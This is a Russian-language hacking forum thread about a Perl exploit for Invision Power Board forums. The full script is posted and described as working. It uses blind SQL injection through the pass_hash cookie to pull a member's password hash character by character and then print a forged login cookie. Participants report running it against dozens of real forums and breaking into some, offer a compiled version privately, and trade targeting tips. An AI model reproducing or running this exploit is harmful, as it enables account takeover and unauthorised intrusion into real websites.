типа оффтоп. но если будете тереть., киньте в личку пожалуйста ответ.
насчет сплойта для ипб,который тянет соль и который во всем инете битый (типа защита от дурака :-)))
у меня с перлом ну ооочень плохо, так что после нескольких часов напряженного скрипения мозгами примерно исправила там где примерно мне показалось, было неправильно :d :d :d
мнэ... самое интересное, что когда его запустила, он мне выдал строку, очень похожую на хеш пароля!!!
(32 символа и все такое....). но вот сижу бручу уже очень долго и никак не могу расбрутить.
вопрос, с кем можно проконсульироваться насчет кода (в том смысле правильно ли я исправила и просто пасс сложный) или может мне просто выдается какаято левая фигня похожая на хеш пасса и дальше мне мучаться с ним не стоит?

зы. извините что много написала.

зызы. перед тем как стереть,ответьте в личку плз

Полностью рабочий вариант сплоита

#!/usr/bin/perl -w

use IO::Socket;

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $host = $ARGV[0]; # hostname
my $path = $ARGV[1] . 'index.php?act=Login&CODE=autologin';
my $user = $ARGV[2]; # userid to jack
my $iver = $ARGV[3]; # version 1 or 2
if($ARGV[4]) { $cpre = $ARGV[4] } else { $cpre = "" }
my $dbug = $ARGV[5]; # debug?
if (!$ARGV[3])
{
print "... By rav3n Usage: ipb_skides.pl site.org /forum/ [id] [ver1/2] [cookie_prefix] [debug].\n\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';

M1:
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*";
$cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "FAILED\n\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Cookie: $cookie\n";
print $socket "Connection: close\n\n";

# If we get a valid sql request then this
# does not appear anywhere in the Location header
$pattern = 'act=Login&CODE=';

$failed = 0;
while(<$socket>)
{
if($dbug) { print };
if(/$pattern/) { $failed = 1; }
}

if($failed==0){
$outputs .= $current;
print "$i char: $current\n";
next M1;
}

}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;

во первых хочу сказать всем спасибо
во вторых хочу поздравить себя с тем ято я правильно исправила сплойт!!!
в третих хочу спросить, а какой вобще процент форумов на которых у работает этот сплойт? а то у меня вобще фигня какаято. уже штук 50 перебрала, только на двух сработало. да и то один заброшеный, а на втором аж 18 юзеров. вобще не весело както ((((

2SladerNon
ага. спасибо. но это несовсем тот сплойт. вернее совсем не тот.
кстате если скажеш откуда брать куки префикс, буду тебе благодарна

во первых хочу сказать всем спасибо
во вторых хочу поздравить себя с тем ято я правильно исправила сплойт!!!
в третих хочу спросить, а какой вобще процент форумов на которых у работает этот сплойт? а то у меня вобще фигня какаято. уже штук 50 перебрала, только на двух сработало. да и то один заброшеный, а на втором аж 18 юзеров. вобще не весело както ((((

2SladerNon
ага. спасибо. но это несовсем тот сплойт. вернее совсем не тот.
кстате если скажеш откуда брать куки префикс, буду тебе благодарна
Сплойт мало-работает, т.к. дырка уже совсем бородатая.
кУки префикс надо сначала в собственном брАузере посмотреть зарегистрировавшись на таргет форуме.

да почему же... есть еще много дырявых форумов даже версий 1.*.*
нужно искать просто получше...
вчера парочку сломала к примеру)
если нужен компилированный сплойт стукнись в личку.

поюзала сплойт (который в рамочке),
оно мне написало: 1 char: 7
и что теперь с этим делать, извиняюсь......

"7" это только первый символ хэша=)))

спасибо. а все остальные я сама должна угадать, или как?

А сплойт от Коула не пашет?